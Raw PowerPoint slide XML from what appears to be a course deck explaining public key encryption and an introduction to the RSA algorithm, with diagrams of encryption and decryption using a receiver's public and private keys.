                <a:ea typeface="新細明體" panose="02020500000000000000" pitchFamily="18" charset="-120"/>
              </a:rPr>
              <a:t>1.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Plaintext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: the data or readable message that is fed into the algorithm as input.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b="1" i="1" dirty="0">
                <a:ea typeface="新細明體" panose="02020500000000000000" pitchFamily="18" charset="-120"/>
              </a:rPr>
              <a:t>2.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Encryption algorithm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: The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algorithm performs various transformations on the plaintext.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b="1" i="1" dirty="0">
                <a:ea typeface="新細明體" panose="02020500000000000000" pitchFamily="18" charset="-120"/>
              </a:rPr>
              <a:t>3.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Public and private keys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: pair of keys that have been selected so that if one is used for encryption, the other is used for decryption. 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The exec transformations  performed by the encryption algorithm depend on the public or private key that is provided as input.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b="1" i="1" dirty="0">
                <a:ea typeface="新細明體" panose="02020500000000000000" pitchFamily="18" charset="-120"/>
              </a:rPr>
              <a:t>4. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="20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Ciphertext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: the scrambled message  produced as output. It depends on the plaintext and the key. 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For a given message, two different keys will produce two different </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0" err="1">
                <a:ea typeface="新細明體" panose="02020500000000000000" pitchFamily="18" charset="-120"/>
              </a:rPr>
              <a:t>ciphertexts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marL="266700" indent="-266700" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" b="1" i="1" dirty="0">
                <a:ea typeface="新細明體" panose="02020500000000000000" pitchFamily="18" charset="-120"/>
              </a:rPr>
              <a:t>5.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Decryption algorithm</a:t>
            </a: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: This algorithm accepts the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0" err="1">
                <a:ea typeface="新細明體" panose="02020500000000000000" pitchFamily="18" charset="-120"/>
              </a:rPr>
              <a:t>ciphertext</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0">
                <a:ea typeface="新細明體" panose="02020500000000000000" pitchFamily="18" charset="-120"/>
              </a:rPr>
              <a:t> and the matching key and produces the original plaintext.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819150" y="5178425"/>
            <a:ext cx="7461476" cy="1227138"/>
            <a:chOff x="819150" y="5178425"/>
            <a:chExt cx="7461476" cy="1227138"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="24581" name="群組 4"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="858838" y="5178425"/>
              <a:ext cx="7408862" cy="881063"/>
              <a:chOff x="900183" y="5781675"/>
              <a:chExt cx="7408792" cy="881064"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="24585" name="群組 19"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="4079562" y="5883788"/>
                <a:ext cx="1114425" cy="778951"/>
                <a:chOff x="5576935" y="5091008"/>
                <a:chExt cx="1113576" cy="947980"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="24596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08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4597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631253" y="5103002"/>
                  <a:ext cx="941560" cy="636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400" b="1" baseline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X?%^*&amp;%)I,gS#!@ ...</a:t>
                  </a:r>
                  <a:endParaRPr lang="zh-TW" altLang="en-US" sz="1400" b="1" baseline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586" name="群組 19"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="900183" y="5867400"/>
                <a:ext cx="1114425" cy="719139"/>
                <a:chOff x="5576935" y="5091008"/>
                <a:chExt cx="1113576" cy="947980"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="24594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08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4595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583664" y="5103001"/>
                  <a:ext cx="1059258" cy="8520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200" b="1" baseline="0" dirty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The resulting data has to  be cleaned …</a:t>
                  </a:r>
                  <a:endParaRPr lang="zh-TW" altLang="en-US" sz="1200" b="1" baseline="0" dirty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587" name="群組 19"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="7194550" y="5881126"/>
                <a:ext cx="1114425" cy="686363"/>
                <a:chOff x="5576935" y="5091008"/>
                <a:chExt cx="1113576" cy="947980"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="24592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08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4593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583664" y="5103001"/>
                  <a:ext cx="1059258" cy="892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200" b="1" baseline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The resulting data has to  be cleaned …</a:t>
                  </a:r>
                  <a:endParaRPr lang="zh-TW" altLang="en-US" sz="1200" b="1" baseline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24588" name="直線單箭頭接點 8"/>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks noChangeShapeType="1"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2105025" y="6364288"/>
                <a:ext cx="184315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589" name="矩形 9"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1986023" y="5781675"/>
                <a:ext cx="2038331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encryption algorithm + </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" altLang="zh-TW" sz="16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public key</a:t>
                </a:r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 </a:t>
                </a:r>
                <a:endParaRPr lang="zh-TW" altLang="en-US" sz="1600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4590" name="矩形 10"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5181630" y="5815013"/>
                <a:ext cx="2038331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decryption algorithm + </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" altLang="zh-TW" sz="16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private key</a:t>
                </a:r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 </a:t>
                </a:r>
                <a:endParaRPr lang="zh-TW" altLang="en-US" sz="1600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4591" name="直線單箭頭接點 11"/>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks noChangeShapeType="1"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5260662" y="6394451"/>
                <a:ext cx="184315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2" name="矩形 18"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="819150" y="5951538"/>
              <a:ext cx="11527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i="1" baseline="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Plaintext </a:t>
              </a:r>
              <a:endParaRPr lang="zh-TW" altLang="en-US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4583" name="矩形 19"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="7127875" y="5951538"/>
              <a:ext cx="11527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i="1" baseline="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Plaintext </a:t>
              </a:r>
              <a:endParaRPr lang="zh-TW" altLang="en-US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4584" name="矩形 20"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3952875" y="6005513"/>
              <a:ext cx="13573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i="1" baseline="0" dirty="0" err="1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Ciphertext</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-TW" sz="2000" baseline="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 </a:t>
              </a:r>
              <a:endParaRPr lang="zh-TW" altLang="en-US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209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C737EF4-163F-405D-9D20-FB723BE43874}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" baseline="0"/>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>63</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="1600" baseline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pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="4000" b="1">
                <a:ea typeface="新細明體" panose="02020500000000000000" pitchFamily="18" charset="-120"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Public Key Encryption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806450"/>
            <a:ext cx="8774112" cy="3597275"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="266700" indent="-266700" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>The essential steps of a public key cryptographic algorithm:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="361950" indent="-361950" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buAutoNum type="arabicPeriod"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>Each user generates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pair of keys </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>to be used for the encryption and decryption of messages.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="361950" indent="-361950" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buAutoNum type="arabicPeriod"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>Each user places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one</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t> of the two keys in a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public register </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>or other accessible file. This is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public</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t> key.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companion key </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>is kept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private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marL="361950" indent="-361950" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buAutoNum type="arabicPeriod" startAt="3"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>If  a sender wishes to send a private message to a receiver,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sender</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t> encrypts the message using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receiver’s public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key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marL="361950" indent="-361950" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buAutoNum type="arabicPeriod" startAt="3"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>When the receiver receives the message, he or she decrypts it using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receiver’s private key</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>. No other recipient can decrypt the message because only the receiver knows his or her private key.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="25605" name="群組 27"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="804863" y="4630738"/>
            <a:ext cx="7408862" cy="1733550"/>
            <a:chOff x="804863" y="4631417"/>
            <a:chExt cx="7408862" cy="1733201"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="25606" name="群組 4"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="804863" y="4631417"/>
              <a:ext cx="7408862" cy="881063"/>
              <a:chOff x="900183" y="5781675"/>
              <a:chExt cx="7408792" cy="881064"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="25613" name="群組 19"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="4079562" y="5883788"/>
                <a:ext cx="1114425" cy="778951"/>
                <a:chOff x="5576935" y="5091008"/>
                <a:chExt cx="1113576" cy="947980"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="25624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08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5625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631253" y="5103002"/>
                  <a:ext cx="941560" cy="636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400" b="1" baseline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X?%^*&amp;%)I,gS#!@ ...</a:t>
                  </a:r>
                  <a:endParaRPr lang="zh-TW" altLang="en-US" sz="1400" b="1" baseline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5614" name="群組 19"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="900183" y="5867401"/>
                <a:ext cx="1114425" cy="719139"/>
                <a:chOff x="5576935" y="5091010"/>
                <a:chExt cx="1113576" cy="947980"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="25622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10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5623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583664" y="5103003"/>
                  <a:ext cx="1059258" cy="8518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200" b="1" baseline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The resulting data has to  be cleaned …</a:t>
                  </a:r>
                  <a:endParaRPr lang="zh-TW" altLang="en-US" sz="1200" b="1" baseline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5615" name="群組 19"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="7194550" y="5881126"/>
                <a:ext cx="1114425" cy="686363"/>
                <a:chOff x="5576935" y="5091008"/>
                <a:chExt cx="1113576" cy="947980"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="25620" name="摺角紙張 17"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="5576935" y="5091008"/>
                  <a:ext cx="1113576" cy="947980"/>
                </a:xfrm>
                <a:prstGeom prst="foldedCorner">
                  <a:avLst>
                    <a:gd name="adj" fmla="val 16667"/>
                  </a:avLst>
                </a:prstGeom>
                <a:noFill/>
                <a:ln w="28575" algn="ctr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marL="609600" indent="-609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zh-TW" altLang="en-US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25621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5583664" y="5103001"/>
                  <a:ext cx="1059258" cy="892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00"/>
                    </a:buClr>
                    <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                    <a:defRPr sz="3200" baseline="-25000">
                      <a:solidFill>
                        <a:schemeClr val="bg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TW" sz="1200" b="1" baseline="0">
                      <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                      <a:ea typeface="新細明體" panose="02020500000000000000" pitchFamily="18" charset="-120"/>
                    </a:rPr>
                    <a:t>The resulting data has to  be cleaned …</a:t>
                  </a:r>
                  <a:endParaRPr lang="zh-TW" altLang="en-US" sz="1200" b="1" baseline="0">
                    <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"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25616" name="直線單箭頭接點 8"/>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks noChangeShapeType="1"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2105025" y="6364288"/>
                <a:ext cx="184315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7" name="矩形 9"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1986023" y="5781675"/>
                <a:ext cx="2038331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encryption algorithm + B’s </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" altLang="zh-TW" sz="16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public key</a:t>
                </a:r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 </a:t>
                </a:r>
                <a:endParaRPr lang="zh-TW" altLang="en-US" sz="1600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5618" name="矩形 10"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5181630" y="5815013"/>
                <a:ext cx="2038331" cy="584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decryption algorithm + B’s </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" altLang="zh-TW" sz="1600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private key</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" altLang="zh-TW" sz="1600" baseline="0" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="00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  </a:t>
                </a:r>
                <a:endParaRPr lang="zh-TW" altLang="en-US" sz="1600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25619" name="直線單箭頭接點 11"/>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks noChangeShapeType="1"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5260662" y="6394451"/>
                <a:ext cx="1843158" cy="1588"/>
              </a:xfrm>
              <a:prstGeom prst="straightConnector1">
                <a:avLst/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607" name="文字方塊 18"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1960108" y="5179105"/>
              <a:ext cx="485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A</a:t>
              </a:r>
              <a:endParaRPr lang="zh-TW" altLang="en-US" sz="20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608" name="文字方塊 19"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5217427" y="5207680"/>
              <a:ext cx="485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B</a:t>
              </a:r>
              <a:endParaRPr lang="zh-TW" altLang="en-US" sz="20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pic>
          <p:nvPicPr>
            <p:cNvPr id="25609" name="Picture 21" descr="C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\BAI40PQ8\MC90030810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296" y="5412807"/>
              <a:ext cx="861332" cy="665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0" name="Picture 25" descr="C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\50SE1PCZ\MC900370028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250" y="5453384"/>
              <a:ext cx="769197" cy="545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文字方塊 25"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2289649" y="5963545"/>
              <a:ext cx="24857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Receiver’s public key</a:t>
              </a:r>
              <a:endParaRPr lang="zh-TW" altLang="en-US" sz="20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5612" name="文字方塊 26"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5727977" y="5964508"/>
              <a:ext cx="24857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Receiver’s private key</a:t>
              </a:r>
              <a:endParaRPr lang="zh-TW" altLang="en-US" sz="20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834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RSA Public Key Encryption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158875"/>
            <a:ext cx="8774112" cy="3203400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"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ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>The RSA Public Key Encryption Algorithm</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              <a:buChar char="–"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>one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of the first public key schemes was introduced in 1978 by Ron </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>R</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>ivest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 err="1">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>Adi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ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>S</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>hamir, and Len </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>dleman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t> at MIT.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"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ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>The RSA algorithm </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="560388" lvl="1" indent="-285750" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              <a:buChar char="–"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>incorporates results from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number theory</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>, combined with the difficulty of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determining the prime factors </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>of a target.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="560388" lvl="1" indent="-285750" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              <a:buChar char="–"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>also operates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modular arithmetic </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>–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mod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4519D52-F6AB-46EF-85AA-5FA188C0ED70}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" baseline="0"/>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>64</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="1600" baseline="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="文字方塊 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1676349" y="4362275"/>
            <a:ext cx="7036828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baseline="0" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>n</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" baseline="0" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" i="1" baseline="0" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" baseline="0" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> * </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" i="1" baseline="0" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>b                  // a, b </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" baseline="0" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>large prime number</a:t>
            </a:r>
          </a:p>
          <a:p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sz="2800" i="1" baseline="40000" dirty="0"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2800" i="1" baseline="30000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mod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" i="1" baseline="30000" dirty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n                 // </a:t>
            </a:r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encrypt with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</a:p>
          <a:p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P</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" i="1" baseline="40000" dirty="0"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2800" i="1" baseline="30000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2800" i="1" baseline="40000" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="新細明體" panose="02020500000000000000" pitchFamily="18" charset="-120"/>
              </a:rPr>
              <a:t>d</a:t>
            </a:r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mod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" i="1" baseline="30000" dirty="0"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n </a:t>
            </a:r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P      // </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800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decrypt with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" i="1" baseline="0" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="新細明體" panose="02020500000000000000" pitchFamily="18" charset="-12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74669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RSA Public Key Encryption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945741"/>
            <a:ext cx="8774112" cy="45490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Two keys, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1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b="1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are used for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" dirty="0">
                <a:ea typeface="新細明體" panose="02020500000000000000" pitchFamily="18" charset="-120"/>
              </a:rPr>
              <a:t>decryption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encryption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An important property is that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can be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interchanged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chosen as a large integer that is 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product</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0">
                <a:ea typeface="新細明體" panose="02020500000000000000" pitchFamily="18" charset="-120"/>
              </a:rPr>
              <a:t> of two large distinct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prime numbers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. (i.e.,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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 encryption key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randomly chosen number </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0">
                <a:ea typeface="新細明體" panose="02020500000000000000" pitchFamily="18" charset="-120"/>
              </a:rPr>
